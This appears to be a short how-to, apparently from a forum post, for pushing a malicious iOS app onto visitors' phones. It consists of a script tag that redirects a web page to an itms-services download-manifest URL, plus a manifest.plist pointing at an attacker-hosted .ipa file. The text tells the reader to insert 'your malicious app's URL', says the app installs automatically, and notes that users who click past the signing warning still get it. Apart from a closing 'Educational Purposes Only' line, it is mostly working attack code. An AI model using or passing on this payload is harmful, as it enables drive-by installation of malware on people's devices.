<script> document . location . href = " itms-services://?action=download-manifest&url=https://example.com/manifest.plist " ; </script>

In the manifest.plist file, include your malicious app's URL:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version= "1.0" >
	<dict>
		<key> items </key>
		<array>
			<dict>
				<key> assets </key>
				<array>
					<dict>
						<key> kind </key>
						<string> software-package </string>
						<key> url </key>
						<string> https://attacker.com/app.ipa </string>
					</dict>
				</array>
				<key> metadata </key>
				<dict>
					<key> bundle-identifier </key>
					<string> com.attacker.app </string>
					<key> bundle-version </key>
					<string> 1.0 </string>
					<key> kind </key>
					<string> software </string>
					<key> title </key>
					<string> App </string>
				</dict>
			</dict>
		</array>
	</dict>
</plist>




This will automatically download and install the app.

The problem is that the user will receive a warning:

"The developer has not received Apple's approval to use this capability."

This is because the app has not been signed with an Enterprise certificate.

If the user proceeds, the app will still be installed.


// Educational Purposes Only!